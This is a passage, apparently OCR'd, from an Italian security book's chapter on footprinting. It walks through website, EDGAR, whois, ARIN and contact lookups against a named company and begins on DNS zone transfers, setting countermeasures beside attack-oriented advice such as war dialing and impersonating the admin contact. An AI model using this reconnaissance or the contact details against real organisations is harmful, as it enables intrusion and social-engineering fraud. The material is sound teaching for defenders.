Intranet Protocolli di rete utilizzati (per esempio, IP, IPX, DecNET ecc.) 
Nomi di dominio interni 
Blocchi di rete . 
Indirizzi IP specifici di sistemi raggiungibili sulla Intranet 
Servizi TCP/UDP in esecuzione su ciascuno dei sistemi individuati 
Architettura di sistema (per esempio SPARC, piuttosto che X86) 
Meccanismi di controllo degli accessi e relativi elenchi (ACL, Access Contro! 
List) 
Sistemi di intercettazione delle intrusioni (IDS) 
Fnumerazione del sistema (nomi utente e di gruppo, messaggi di sistema, 
tabelle di instradamento, informazioni SNMP) 


Accesso Numeri delle linee telefoniche analogiche/digitali 
remoto Tipo di sistema remoto 

Meccanismi di autenticazione 

VPNs e protocolli correlati (IPSEC, PPTP) 
Extranet Fonte e destinazione della connessione 

Tipo di connessione 

Meccanismi di controllo degli accessi 


Il footprinting è spesso la fase più difficile del tentativo di determinare il livello di 
protezione di un’organizzazione, ma è sicuramente quella più importante; per que- 
sto motivo dev'essere eseguita con scrupolo e in modalità controllata. 


Footprinting di Internet 


Nonostante le tecniche di footprinting siano più o meno le stesse per le diverse tec- 
nologie (Internet e Intranet), in questo capitolo ci concentreremo sullo studio delle 
connessioni di una struttura a Internet. L'accesso remoto verrà illustrato dettagliata- 
mente nel Capitolo 8. È difficile delineare una procedura di footprinting precisa, da 
seguire passo passo, poiché si tratta di un'attività con innumerevoli varianti. Tutta- 
via, in questo capitolo illustreremo alcuni passaggi fondamentali, che dovrebbero 
permettervi di completare un’analisi rigorosa del profilo dell'obiettivo. Molte di que- 
ste tecniche sono applicabili anche alle tecnologie citate in precedenza. 


Passaggio l: delimitazione dell’ambito d’azione 


Per prima cosa, è necessario stabilire i confini per le attività di footprinting. Volete 
ricostruire il profilo dell’intera azienda o piuttosto limitare la ricerca ad alcune aree 
(per esempio, la sede centrale o una particolare filiale)? In certi casi, l’identificazio- 
ne di tutte le entità correlate con l’obiettivo può rivelarsi un'impresa titanica. Fortu- 
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natamente, però, Internet mette a disposizione un ricco arsenale di risorse che con- 
sente di restringere il raggio d'azione, oltre a fornire una serie di informazioni 
sull'obiettivo e i suoi dipendenti. 
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Diffusione: 9 
Semplicità: 9 
Impatto: sa 
Fattore di rischio: 74 


Come punto di partenza, sfruttate l'eventuale pagina Web dell'obiettivo. Spesso le 
pagine Web delle aziende contengono una quantità inimmaginabile di informazioni 
che possono risultare utili a un hacker. Personalmente, abbiamo trovato aziende 
che pubblicavano direttamente sul server Web Internet le opzioni di configurazione 
della protezione del proprio sistema di firewall. Altri elementi interessanti sono: 
sedi; 

società o soggetti collegati; 

informazioni su fusioni e acquisizioni; 

numeri telefonici; 

nomi e indirizzi e-mail di contatti; 

politiche di tutela della privacy o di protezione in cui sia indicato il tipo di 
meccanismo di sicurezza adottato; 

e collegamenti adaltri server Web legati all'azienda. 


Inoltre, provate a cercare nei sorgenti HTML eventuali commenti. Spesso informa- 
zioni non destinate alla fruizione pubblica sono nascoste nei tag HTML di commen- 
to, come “<”, “° e “ -”, Poiché è più veloce visualizzare il codice sorgente offline 
che non online, è conveniente replicare l'intero sito per la visualizzazione offline. 
Disporre di una copia locale del sito consente di eseguire ricerche programmatiche 
di commenti o di altri elementi di interesse, rendendo le attività di footprinting più 
efficienti. wget (http://ww.gnu.org/software/wget/wget.html) per UNIX e Te- 
leport Pro (http://ww.tenmax.com/teleport/pro/home.htm) per Windows sono 
ottime utilità di replica di interi siti Web. 

Dopo aver studiato le pagine Web, potete provare a effettuare una ricerca libera su 
informazioni riguardanti il vostro obiettivo. Notizie, comunicati stampa e simili posso- 
no rivelare ulteriori indizi circa lo stato della struttura e il suo livello di protezione. Siti 
Web come finance.yahoo.com o http://www.companysleuth.com rappresentano 
una miniera di informazioni. Se la società che state analizzando ha una presenza im- 
portante su Internet, potreste trovare articoli di cronaca in cui si parla di problemi di 
sicurezza verificatisi in passato. Il vostro motore di ricerca preferito dovrebbe essere 
più che sufficiente in questa fase (ww.google.com andrà benissimo). Un’alternativa 
gratuita per effettuare ricerche su diversi motori è http://www. dogpile.com. 

Spesso una ricerca su USENET di messaggi riguardanti @obiettivo.com può per- 
mettere di rilevare informazioni utili. Per esempio, una volta abbiamo trovato un 
messaggio proveniente dall’account di lavoro di un amministratore di sistema a pro- 
posito del nuovo sistema PBX: diceva di non conoscerlo bene e di non sapere come 
disattivare gli account e le password predefiniti. Ci vengono i brividi a pensare alla 
quantità di persone che speravano di sfruttare quella società per telefonare gratuita- 
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mente. È scontato sottolineare che per ricavare ulteriori indizi sull’organizzazione e 
la competenza dello staff di una società è sufficiente rileggere i messaggi. 

Infine, potete sfruttare le funzionalità di ricerca avanzata offerte da alcuni dei princi- 
pali motori di ricerca, come AltaVista o Google, che permettono, per esempio, di 
cercare tutti i siti contenenti collegamenti al dominio del vostro obiettivo. Potrebbe 
sembrare del tutto inutile, ma considerate le implicazioni: supponete che qualcuno 
che fa parte della struttura decida di realizzare un sito pirata a casa propria o all’in- 
terno della rete del vostro obiettivo. Questo server Web potrebbe non essere del 
tutto sicuro o approvato dalla società. Un buon punto di partenza per risalire a pos- 
sibili siti di questo genere è stabilire quali siano quelli contenenti collegamenti di- 
retti al server dell'obiettivo, come mostrato nella Figura 1.1. 


Wi altavista Tiy yom search in: Shopping « Images » Yidac » MPI/AUGdio » News 
Boolean query: Help | Customize Settinas | Family Filterisatt 


link: www, }Opht.com and hacking £ 
di (eopin) D 


Sort by: | 


More Advanced Searoh Options Search Assistant | Barie Saarch 


Home > Agranced Search > Search Results for link:www.0pht.com and hacki... , page 1 of 20 


We found 2,424 results: 


sidr - Developed Software Development links + more [last page visited | 
Systamatized Personalized. Networked Discovery Engineered. Developed, Practiced. Web Dev. Sw Dev. App Dev Server Dev Linux Dev 
OpenSrc Dev. 


î 

Security links. 
AS/400 Secunty More Stuff Mare InfoSecunty Stuff. AS/400 Security Vendors, Patrol 400- A security reporting and audit tool, from 
Focus 


FL hito #ho: 


mhink natf-vevegue/puge? him!» Translate 


hackinthebox. org - hackinthebox, org 
Searchi(from sacurityfocus com) All. Advisonas Announcements. Calendar Focus Areas (all) + Focus on Incidents. - Focus on |DS. - 
Focus on Linux 


CREERI 


Figura 1.1 


Con il motore di ricerca AltaVista potete utilizzare come filtro il link www.lOpht.com, per visualizzare 
tutti i siti con riferimenti al dominio target. 


La ricerca ha identificato tutti i siti con collegamenti a www. 19pht.com contenenti la 
parola “hacking”. Allo stesso modo è possibile trovare i siti collegati al dominio che 
avete come obiettivo. 

L'ultimo esempio, riportato nella Figura 1.2, consente di restringere la ricerca a un 
sito specifico. In questo caso si sono cercate tutte le occorrenze di mudge all’interno 
di http://ww.l@pht.com. Modificare questa interrogazione per cercare altri ele- 
menti di interesse è tutt'altro che complesso. 
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Boolean query: tale | Customize Settings | Eamibe Fior iett 


uve, 10pht ., com and mudge 
21 [onyianguage x] 


eo _—_—_—___—___l 


More Advanced Seacoh Outivos Saarsh Assistant | Bazis Search 


Home > Advanced Search > Search Results for hostwww.J0pht.con and murdge... , page 1 of 1 
We found 2 results: 


Hackers Tell Congress How They Operate. by Richard Mullins, Medill News Service May 22, 1998. WASHINGTON, DC--A panel of US. 
Senators stared in 

URL hitp/ivove INpht co 
Additional relevant page 


GNN Transenpts 

COMMUNITY Message Boards Chat Fesdback SITE SOURCES Contents Help! Search CNN Networks SPECIALS Quick News 
Almanac Video Vault News Quiz World Today 

VAL 7 3 tan/presskit/presa . rpt_D51998 html » Translate 

Adbrtiona! ! t 


DEMENTE TOA pe EE ; (OS NS ir 


Con AltaVista, la direttiva host:www.lOpht.com consente di interrogare il sito 
relativamente alla stringa specificata (per esempio mudge). 


Ovviamente, in questi esempi abbiamo considerato solo una minima parte delle in- 
formazioni che potreste cercare nei vostri viaggi: siate creativi. A volte è proprio la 
ricerca più improbabile a offrire i risultati migliori. 


Ricerche su EDGAR 


Se il vostro obiettivo è una società quotata pubblicamente, potete consultare il data- 
base EDGAR di SEC (Securities and Exchange Commission), che si trova all'indiriz- 
zo http://ww.sec.gov, come mostrato nella Figura 1.3. 

Uno dei maggiori problemi che le aziende si trovano ad affrontare è la gestione del- 
le connessioni a Internet, in particolare durante i processi di fusione o acquisizione 
di altre entità. Per questo è importante concentrarsi su eventuali nuove acquisizioni. 
Due delle pubblicazioni più interessanti di SEC sono la 10-Q e la 10-K: la prima rap- 
presenta un'istantanea di quello che l'azienda ha realizzato nell’ultimo trimestre, 
comprese eventuali acquisizioni o dismissioni; la seconda è un aggiornamento an- 
nuale delle attività dell'azienda e potrebbe non essere attuale quanto la 10-Q. È 
consigliabile studiare questi documenti, cercando riferimenti a consociate e simili, 
da cui ricavare informazioni su società acquisite di recente. Spesso le aziende si fan- 
no prendere dalla fretta di collegare le nuove arrivate alla propria rete, trascurando 
la sicurezza, quindi non è raro trovare nella struttura di protezione della società ac- 
quisita punti deboli che consentono di accedere alla società madre. In fin dei conti, 


| a 
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 Agicress hit: //vnae se0 gov/ogitan sichvedos 


earch stina tellat ode 
|Foundstone | Search fissi | 2001 A][Simpie DI 


Search Help 


header information 


EXAMPLES 


picrosysterns 
sun AND microsysterns 
» sun <NEAR/1> microsystems 


©) 


Figura 1.3 


Il database EDGAR consente la ricerca di documenti pubblici: osservando i collegamenti ci si può 
rendere conto delle dimensioni di un'organizzazione. 


gli hacker sono opportunisti e con ogni probabilità sfrutteranno la confusione che 
normalmente accompagna la fusione di due reti. 

Nel caso delle ricerche su EDGAR, ricordate che state cercando riferimenti a nomi 
di società diversi da quello dell’azienda principale. Questo si rivelerà determinante 
nei passaggi successivi (si veda “Passaggio 2: enumerazione della rete”), quando ef- 
fettuerete interrogazioni sui diversi database whois disponibili. 


Contromisura: controllo dei dati disponibili al pubblico 


La maggior parte delle informazioni presentate fino a questo punto deve essere resa 
pubblica, in particolare nel caso di società quotate sul mercato. Tuttavia, è impor- 
tante valutare e classificare il tipo di informazioni distribuite. La Guida alla sicurezza 
del sito (Site Security Handbook, RFC 2196) è disponibile all'indirizzo http:// ww. 
faqs.org/rfcs/rfc2196.html ed è una straordinaria fonte di informazioni per 
molte problematiche legate alla politica di sicurezza. Per finire, eliminate dalle pagi- 
ne del vostro sito Web qualsiasi informazione non strettamente necessaria che po- 
trebbe aiutare un hacker ad accedere alla vostra rete. 
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Passaggio 2: enumerazione della rete 


Diffusione: 
Semplicità: 
Impatto: 

Fattore di rischio: 


xIu 0 ‘0 


Il primo passo nel processo di enumerazione della rete consiste nell’identificare i 
nomi di dominio collegati a una specifica organizzazione e le relative reti. I nomi di 
dominio rappresentano la presenza della società su Internet e sono l'equivalente 
del nome dell'azienda: per esempio, AAAApainting.com e moetavern. com. 

Per catalogare questi domini e iniziare a identificare le reti che vi si collegano è 
necessario effettuare ricerche su Internet. Esistono numerosi database whois, dai 
quali è possibile ottenere una quantità impressionante di informazioni su ciascuna 
delle organizzazioni di cui si sta cercando di ricostruire il profilo. Prima della fine 
del 1999, Network Solutions deteneva il monopolio come organismo principale 
per la registrazione dei domini (com, net, edu e org) e manteneva queste informa- 
zioni sui suoi server whois. 

Attualmente la situazione è diversa ed esistono tantissimi organismi accreditati per 
la registrazione di domini (http://www.internic.net/alpha.html), ciascuno dei 
quali aggiunge nuovi passaggi nella ricerca dei nostri obiettivi (si veda il paragrafo 
“Indagine sul registrar” più avanti in questo capitolo), in quanto sarà necessario in- 
terrogare il registrar corretto per ottenere le informazioni di nostro interesse. 

La Tabella 1.2 riporta numerosi strumenti che possono essere utilizzati per interro- 
gare i diversi database whois. Tuttavia, le informazioni restituite sono sempre le 
stesse, indipendentemente dal metodo utilizzato. 


Tabella 1.2 = Strumentie fonti dati per ricerche whois 


Strumento Risorse Piattaforma 

Interfaccia Web http://www.networksolutions.com/ Qualsiasi piattaforma con 
http://ww.arin.net un client Web 

Client whois whois è incluso nella maggior parte delle UNIX 


versioni di UNIX. 
fwhois è stato sviluppato da Chris Cap- 
puccio <ccappuc@santafe .edu> 


WS Ping ProPack http://www.ipswitch.com/ Windows 95/NT/2000 
Sam Spade http://www. samspade.org/ssw Windows 95/NT/2000 
Sam Spade Web http://ww.samspade.org/ Qualsiasi piattaforma con 
un client Web 
Netscan http://www.netscantools.com/ Windows 95/NT/2000 
nstpromain.html 
Xwhois http://c64.0rg/-nr/whois/ UNIX con X e il toolkit 


GUI GTK+ 


La Tabella 1.3 contiene un elenco di altri server whois che possono risultare utili 
quando si ricercano domini diversi da com, net, edu o org. Un'altra preziosa fonte 
di informazioni, specialmente per trovare server whois al di fuori degli Stati Uniti, è 
ww.allwhois.com. Questa è una delle risorse whois più complete disponibili su 
Internet. 
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Tabella 1.3 Fonti di database whois di governi, eserciti e società internazionali 


Server whois Indirizzo 

European IP Address Allocations http://whois.ripe.net 
Asia Pacific IP Address Allocations http://whois.apnic.net 
U.S. Military http://whois.nic.mil 
U.S. Government http://whois.,nic,gov 


Con ogni interrogazione è possibile raccogliere nuove informazioni. Fondamental- 

mente, la maggior parte delle informazioni utilizzate dagli hacker per preparare un 

attacco rientra in quattro classi di interrogazioni. 

e Registrar: riporta tutte le informazioni disponibili su uno specifico registrar 
e i server whois associati. 

e Organizzazione: riporta tutte le informazioni disponibili su una specifica or- 
ganizzazione. 

e Dominio: riporta tutte le informazioni disponibili su uno specifico dominio. 

® Rete: riporta tutte le informazioni disponibili su una specifica rete o indirizzo IP, 

e Punto di contatto (POC, Point of Contact): riporta tutte le informazioni di- 
sponibili su una specifica persona, di solito un amministratore. 


Indagine sul registrar 


Con l'avvento del sistema di registrazione condivisa (ovvero, registrar multipli), è 
necessario consultare il server whois.crsnic.net per ottenere l'elenco dei poten- 
ziali domini che corrispondono al nostro obiettivo e le informazioni di registrar as- 
sociate. È necessario determinare il registrar corretto per poter inviare interrogazio- 
ni dettagliate al database corretto in passaggi successivi. Nel nostro caso utilizzere- 
mo come obiettivo Tellurian Networks ed effettueremo l'interrogazione da una shell 
di comando UNIX (Red Hat 6.2). Nella versione di whois che utilizziamo, l'opzione 
@ permette di specificare un database alternativo. Alcuni client whois di derivazio- 
ne BSD (per esempio, OpenBSD o FreeBSD) consentono di utilizzare l'opzione -a 
per specificare il database alternativo. Per ulteriori informazioni su come inviare in- 
terrogazioni whois dal client whois, utilizzate il comando man whois. 

Quando si esegue questa ricerca è conveniente utilizzare un carattere jolly in quan- 
to fornisce risultati aggiuntivi. Utilizzando il punto (.) dopo tellurian, vengono elen- 
cate tutte le occorrenze dei domini che iniziano con tellurian, invece dei domini che 
corrispondono esattamente alla stringa tellurian: 


[bash]$ whois "tellurian."@whois.crsnic.net 
[whois.crsnic.net] 
Whois Server Version 1.3 


Domain names in the .com and .net domains can now be registered with many 
different competing registrars. Go to http://ww.internic.net for detailed 
information. 


TELLURIANTECH. COM 
TELLURIANSTUDIOS . COM 
TELLURIANSOFTWARE . COM 
TELLURIANSERVICES.COM 
TELLURIANS.COM 
TELLURIANMEDIA.COM 
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TELLURIANIS. COM 
TELLURIANINC.COM 
TELLURIANGROUP . ORG 
TELLURIANGROUP , NET 
TELLURIANGROUP . COM 
TELLURIANENGINEERING. COM 
TELLURIANCOSMETICS. COM 
TELLURITANCENTRAL. NET 
TELLURIANAGROUP , COM 
TELLURIAN.ORG 
TELLURIAN.NET 
TELLURIAN.COM 
TELLURIAN-ONLINE COM 
TELLURIAN- INTERACTIVE .COM 
TELLURIAN-INC.COM 
TELLURIAN-COFEDERATION.ORG 


[bash]$ whois "tellurian.,net"@whois.crsnic.net 
[whois.crsnic.net] 


Whois Server Version 1.3 


Domain Name: TELLURIAN.NET 

Registrar: BULKREGISTER.COM, INC, 

Whois Server: whois.bulkregister.com 
Referral URL: http://ww.bulkregister.com 
Name Server: GATE.TELLURIAN.NET 

Name Server: NTBOX.TELLURIAN.NET 

Name Server: DNS3.TELLURIAN.NET 


Updated Date: 05-nov-2001 


Indagine sull’organizzazione 


L'indagine sull’organizzazione è stata un metodo molto utilizzato per ricercare le 
istanze del nome di una determinata organizzazione, in quanto più generico della 
ricerca di uno specifico nome di dominio. I lettori delle precedenti edizioni di que- 
sto volume avranno sicuramente utilizzato questo tipo di indagine per anni, tuttavia 
questa funzionalità attualmente non è più disponibile: Network Solutions ha deciso 
di eliminarla per limitare il fenomeno dello spamming, diventato nel tempo un pro- 
blema di dimensioni sempre maggiori, giustificandosi dicendo che “tali modifiche 
sono state ritenute necessarie al fine di conciliare l'entità e la tipologia delle ricer- 
che. Il servizio WHOIS è stato in questo modo messo in condizione di gestire e pre- 
venire il suo eventuale utilizzo improprio”. 


Indagine sui domini 


Basandoci sulla nostra indagine sull’organizzazione, cercheremo ulteriori dettagli 
relativi a tellurian.net: 


bash]$ whois tellurian.net@whois.bulkregister.com 


Tellurian Networks, Inc. 
172 Spring Street 
Newton, NJ 07860 
US 
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Domain Name: TELLURIAN.NET 


Administrative Contact:: 
The Tellurian Hostmaster: robert@tellurian.net 
Tellurian Networks, Inc. 
172 Spring Street 
Newton, NJ 07860 
US 


Phone:: 973-300-9211 
Fax:: 973-579-3643 


Technical Contact:: 
The Tellurian Hostmaster: robert@tellurian.net 
Tellurian Networks, Inc. 
172 Spring Street 
Newton, NJ 07860 
US 


Phone:: 973-300-9211 
Fax:: 973-579-3643 


Record updated date on: 2001-10-02 16:18:27 
Record created date on: 1998-10-09 

Record will be expiring on date: 2005-10-08 
Database last updated on: 2002-11-10 16:00:10 EST 


Domain servers in listed order: 


DNS3. TELLURIAN. NET 216.182.4,5 
GATE.TELLURIAN. NET 216.182,1.1 
NTBOX. TELLURIAN.NET 216.182.1.2 


Questo tipo di interrogazione fornisce informazioni relative ai seguenti elementi: 
il soggetto registrato (registrant); 

il nome del dominio (domain name); 

il contatto amministrativo (administrative contact); 


la data di creazione (created) e di ultima modifica (last updated) del record; 

e iserver DNS primari e secondari. 

A questo punto dovete liberare il cybersegugio che è in voi: analizzate le informa- 
zioni alla ricerca di indizi significativi. Nel nostro linguaggio, definiamo l'eccesso o 
una fuga di informazioni come “invito”, nel senso che rappresentano uno stimolo 
per l'hacker a focalizzare con maggior precisione il proprio attacco. Esaminando le 
informazioni sul soggetto registrato, possiamo verificare se il dominio appartiene ef- 
fettivamente all'entità che ci interessa. Sappiamo che la Tellurian Networks ha sede 
in New Jersey, quindi possiamo concludere che queste informazioni sono pertinen- 
ti. Ricordate che la localizzazione del soggetto registrato non deve necessariamente 
corrispondere con la sua sede fisica. Molte società possono avere più sedi geografi- 
che, ciascuna dotata di una propria connessione a Internet; tuttavia, le diverse sedi 
potrebbero essere registrate sotto un’unica entità. In altri casi potrebbe essere ne- 
cessario verificare che la località specificata sia effettivamente legata alla società. Il 
nome di dominio è identico a quello utilizzato per eseguire l'interrogazione. 
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Il contatto amministrativo, invece, rappresenta un'informazione molto importante, 
poiché potrebbe identificare la persona responsabile della connessione a Internet o 
del firewall; inoltre, riporta numeri telefonici e di fax. Queste informazioni sono 
estremamente utili se l’obiettivo della ricerca è realizzare un’infiltrazione via telefo- 
no: è sufficiente scatenare alcuni war dialer sull’intervallo di numeri specificato per 
identificare i numeri di modem. Inoltre, spesso l’intruso si presenta assumendo 
l'identità del contatto amministrativo, applicando nozioni di ingegneria sociale sugli 
ignari utenti della società. Un hacker potrebbe inviare a un utente ingenuo messag- 
gi di posta elettronica contraffatti spacciandosi per il contatto amministrativo. È in- 
credibile quante persone siano disposte a modificare la password nel modo indica- 
to, se ritengono che la richiesta arrivi da una persona fidata del supporto tecnico, 
Le date di creazione e modifica del record sono un indice dell’accuratezza delle in- 
formazioni. Se il record è stato creato cinque anni fa e non è stato mai aggiornato, 
con ogni probabilità alcune delle informazioni (per esempio, l'identità del contatto 
amministrativo) potrebbero essere obsolete. 

l’ultimo dato consente di identificare i server DNS: il primo che compare nell'elenco è 
il server DNS primario, quelli successivi sono il secondario, terziario e così via. Queste 
informazioni risulteranno utili per l'interrogazione del DNS, che affronteremo nel pro- 
sieguo del capitolo. L'intervallo di “indirizzi” riportati nell'elenco può essere inoltre 
utilizzato come punto di partenza per l'interrogazione del database ARIN sulla rete. 


Indagine sulla rete 


ARIN (American Registry for Internet Numbers) è un altro database che può essere 
utilizzato per determinare le reti associate al dominio di interesse. Questo database 
contiene le informazioni relative ai blocchi di rete specifici posseduti dall’organizza- 
zione. Questo tipo di indagine è particolarmente importante per stabilire se il nostro 
obiettivo è effettivamente il proprietario di un sistema oppure è controllato da 
un'altra organizzazione, quale un ISP. 

Nel nostro esempio, possiamo provare a determinare tutte le reti controllate da Tel- 
lurian Networks. L’interrogazione del database ARIN è particolarmente facile, in 
quanto non soggetta alla limitazione dei cinquanta record implementata da 
Network Solutions. Notate l’utilizzo del carattere jolly “.”: 


bash]$ whois "Tellurian Net*"@whois.arin.net 
[[whois.arin.net] 


Tellurian Networks (TELL) 

Tellurian Networks (formerly GardenNetworks) (GNNT) 

Tellurian Networks (AS10848) TELLURIAN-AS 10848 

Tellurian Networks TN-1-NET (NET-216-182-0-0-1) 216.182.0.0 - 
=216.182.63,255 

Tellurian Networks (formerly GardenNetworks) GN-3-BLK (NET-66-97-0-0-1) 
=66.97.0.0 - 66.97.15.255 


È possibile inviare un’interrogazione maggiormente specifica basata su un particola- 
re blocco di rete (10.10,10.0): 


[bash]$ whois 216.182.0.0@whois.arin.net 
[[whois.arin.net] 


OrgName:; Tellurian Networks 
OrgiD: TELL 
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NetRange: 216.,182,0.0 - 216.182.63.255 
CIDR: 216.182.0.0/18 

NetName: TN-1-NET 

NetHandle: NET-216-182-0-0-1 

Parent: NET-216-0-0-0-0 

NetType: Direct Allocation 
NameServer: GATE.TELLURIAN.NET 
NameServer: NTBOX.TELLURIAN.NET 
NameServer: DNS3.TELLURIAN.NET 


Comment: 
RegDate: 2001-02-28 
Updated: 2001-02-28 


TechHandle: RB590-ARIN 

TechName: Boyle, Robert 
TechPhone: +1-973-300-9211 
TechEmail: robert@tellurian.net 


ARIN offre un pratico sistema di interrogazione tramite Web, come mostrato nella 
Figura 1.4. Analizzando il risultato, si nota come Tellurian Networks disponga dello 
spazio di rete da 216.182.0.0 a 216.182.63.255. 


Abowt Arin Registration Services Whois: Minutes & Presentatione 
Routing Registry Membership —Inesmei Coordinatiom —Library 


Whois Database Search È 


| RI 


Other Whois 
Searches 


AnterNiC 


Qepartment of 
Defense 


ARIN's Whois program searches ARIN's database to locate Information on networks, autonomous system numbers (ASNs), 
network-related handles, and other ralated Points of Contact (POCs) This search tool will not provide information relating to 
domains, military networks (MIPRNET) or networks registered through RIPE NCL or APNIC 


Hthe information you are seeking is located within ARIN's database, your search may be initiated by inserting relevant words or 
numbers in the “Search For" dialogue box. Unless your search sinng is specific, the results you obtain may be vary broad Your 
search has the potential to pronide information on network names, network numbers, ASNs and host information as well as the 
names, addresses, telephone numbers, and email addresses for Points of Contact 


The IP 


Registration To follow instructions designed to help you fine-tune your search, complete tha search field above with “?" and hi enter. This step 
Services Help will take you to a screen that provides helpful sharteuts and refinements 
Desk is open from 


7amto/pm, 
Eastern Time to 
assist you and may 
he reached by 


Once you have inserted your search string, choose the “Submit” key to launch your search, In general, you may canduet a search 
USing a name, an |P address, an ASN, a host name, or an ARIN handle When searching the database for an ARIN handie, be sure 
to add the -ARIN extension 10 the searched for handle, fot example TMI7-ARIN, Ssarches using a numerical search string have 
some guiding principles that are worth mentioning separataly 


The ARIN Whois program has been modifiad to more effactvely accommodate classless queries. Prior versions providad results on 
classful quenes only. To cite an example: A query using Netnumber 10.8. 0.0 under the older version of Whois yielded a "no match 
found" response. Querying 10.0.0.0.0, 12°, or 10. previously located up to 256 records inside the Class A block (too much 


(703) 227-0676 information). Using the enhanced Whois search, the user can query any net number, including numbers located within a CIDR block 
È je ie ne ovon for pumhare Incatar da rissefi hi haundarnos PF] 


Figura 1.4 
Uno dei modi più comodi per interrogare il database ARIN è utilizzare il relativo sito Web. 
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Indagine sui POC 


È consigliabile effettuare un'indagine di tipo POC (Point Of Contact) per ricercare, 
all’interno del database ARIN, informazioni addizionali su un determinato punto di 
contatto. Nell'esempio preso in considerazione (Figura 1.5) abbiamo ricercato nel do- 
minio ww.arin.net l'indirizzo e-mail robert@tellurian. net, che avevamo trovato 
tra i contatti nel corso dell'indagine sul dominio portata a termine in precedenza, 
all'interno delle informazioni amministrative. In questo caso, robert@tellurian.net 
non risulta essere un POC in nessun altro dominio, tuttavia può accadere che una ri- 
cerca di questo tipo restituisca un elenco di domini che non avete mai sentito nomi- 
nare. Potete inoltre effettuare ricerche generiche del tipo “@nome_azienda”, che vi 
mostreranno tutte le persone che hanno un indirizzo di posta elettronica gestito dal 
dominio che state ricercando. 


FEfi Spade — 


[whois 


finished] i CIocg 


lEfcomoconpeny.con__2]@[8|®) 
.com is a domain of USA € International Commercial DI 
Searches for .com can be run at http://rs.internic.net/cgi-bin/wh 


hois -h whois.internic,net born.com 


Registrant: 

Some Company, Inc. ( SOMECOMPANY-DOM ) 
111 Grant Ave, 
Springfield, TX 12345 
Us 


Domain Name: SOMECOMPANY. COM 


Administrative Contact: 
Smith. Mike (MS0000) msmith@somecompany.com 
123-456-7890 (FAX) 123-456-7891 

Technical Contact, Zone Contact: 
Smith, Mike (MS0000) msmith@somecompany.com 
123-456-7890 (FAX) 123-456-7891 

Billing contact: 
Smith, Mike (MS0000) msmith@somecompany.com 
123-456-7890 (FAX) 123-456-7891 


Record last updated on 03-Dec-98. 
Record created on 31-Jan-95. 
Database last updated on 27-Jun-99 08:17:22 EDT. 


Domain servers in listed order: 


NS-DI1A.BIGISP.COM 172,29,11.1 
NS-01B.BIGISP.COM 172.29.11.2 


E: ==>" TIZIA È : Tree eg 


Figura 1.5 


Mediante www.arin.net è possibile effettuare una ricerca delle informazioni 
più importanti su un punto di contatto (POC). 
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D) Contromisura: controllo dei dati disponibili al pubblico 


Molte delle informazioni contenute nei diversi database presentati hanno carattere 
pubblico. I contatti amministrativi, i blocchi di rete registrati e le informazioni sui 
server dei nomi di riferimento devono essere specificati quando un’organizzazione 
registra un dominio su Internet. Tuttavia, esistono alcune precauzioni che permetto- 
no di ostacolare il lavoro dei possibili hacker. 

Molto spesso un contatto amministrativo riesce a modificare le informazioni sul do- 
minio anche dopo aver lasciato la società. Quindi, il primo aspetto da verificare è 
che le informazioni riportate nel database siano corrette. Aggiornate appena possi- 
bile le informazioni sui contatti amministrativo, tecnico e contabile. Inoltre, dovete 
prestare attenzione ai numeri di telefono riportati, in quanto possono essere utiliz- 
zati come punto di partenza per un’intrusione telefonica oppure a scopo d’ingegne- 
ria sociale. Valutate l'ipotesi di specificare un numero verde o che non rientri 
nell’intervallo associato alla vostra azienda. In certi casi, alcune aziende hanno scel- 
to di dichiarare un contatto amministrativo fittizio, nella speranza di trarre in ingan- 
no gli aspiranti truffatori: nel caso in cui riceva un messaggio o una telefonata a 
nome del falso contatto, un dipendente può così avvisare i servizi di sicurezza inter- 
ni dell'esistenza di un possibile problema. 

Un altro rischio connesso alla registrazione dei domini è dovuto alle modalità di ag- 
giornamento consentite da alcuni registrar. Per esempio, l’attuale implementazione 
di Network Solutions prevede la possibilità di modificare online le informazioni sul 
dominio in modo automatico. Network Solutions verifica l'identità del soggetto che 
ha registrato il dominio in tre modi diversi: il campo FROM di un e-mail, una pass- 
word o con una chiave PGP (Pretty Good Privacy). Sorprendentemente, il metodo 
standard di autenticazione è quello più diffuso e comporta enormi implicazioni a li- 
vello di sicurezza. In realtà, chiunque è in grado di costruire un indirizzo di posta 
elettronica e modificare le informazioni associate al vostro dominio (meglio cono- 
sciuto con il nome di dirottamento del dominio). È esattamente quello che è succes- 
so a AOL (America On Line) il 16 ottobre 1998, come ha riportato il Washington 
Post: qualcuno, spacciandosi per un responsabile di AOL, ha modificato le informa- 
zioni sul dominio in modo che tutto il traffico venisse dirottato su autonete.net. 
AOL è riuscita a ripristinare la normalità in tempi brevi, ma l'episodio serve a sotto- 
lineare quanto sia fragile la presenza di un’organizzazione su Internet. È fondamen- 
tale optare per una soluzione più sicura, come l'autenticazione basata su password 
o chiave PGP, per la modifica delle informazioni domain. Inoltre, spetta al contatto 
amministrativo o tecnico stabilire il meccanismo di autenticazione, utilizzando il 
modulo contatti (Contact Form) di Network Solutions. 


Passaggio 3: interrogazione del DNS 


Una volta identificati tutti i domini associati, si può procedere all’interrogazione del 
DNS, un database distribuito che viene utilizzato per gestire la corrispondenza tra 
indirizzi IP e nomi host e viceversa. Se il DNS non è adeguatamente protetto, è pos- 
sibile ricavare informazioni preziose sull’organizzazione. 
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9 Trasferimento di zona 


Diffusione: 9 
Semplicità: 9 
Impatto: 3 
Fattore di rischio: 7 


Consentire a utenti Internet non affidabili di effettuare un trasferimento delle zone 
DNS è uno degli errori di configurazione più gravi che un amministratore di sistema 
possa commettere. 

Un trasferimento di zona consente a un server master secondario di aggiornare il 
proprio database di zona rispetto al master primario. Questa operazione tiene conto 
di un certo livello di ridondanza del sistema DNS, in caso di guasti o interruzioni nel 
server dei nomi principale. In generale, l'operazione di trasferimento di zona do- 
vrebbe essere richiesta solo da server DNS master secondari. Tuttavia, molti server 
DNS vengono configurati in modo errato, così da fornire una copia della zona a 
chiunque la richieda. Questo non è necessariamente un male, se le uniche informa- 
zioni trasmesse riguardano sistemi collegati a Internet e associati a nomi host validi; 
tuttavia, può semplificare la ricerca di possibili bersagli da parte di un hacker. I veri 
problemi insorgono quando l’organizzazione non utilizza un meccanismo di DNS 
pubblico/privato per separare le proprie informazioni DNS esterne, che sono pub- 
bliche, da quelle interne, private. In questo caso, i nomi degli host e gli indirizzi IP 
interni risultano visibili all'hacker. Consentire a un utente Internet non affidabile di 
ottenere informazioni sugli indirizzi IP interni è un po’ come permettergli di consul- 
tare il progetto della rete aziendale interna. 

Vediamo alcuni metodi che consentono di effettuare il trasferimento di zona e 
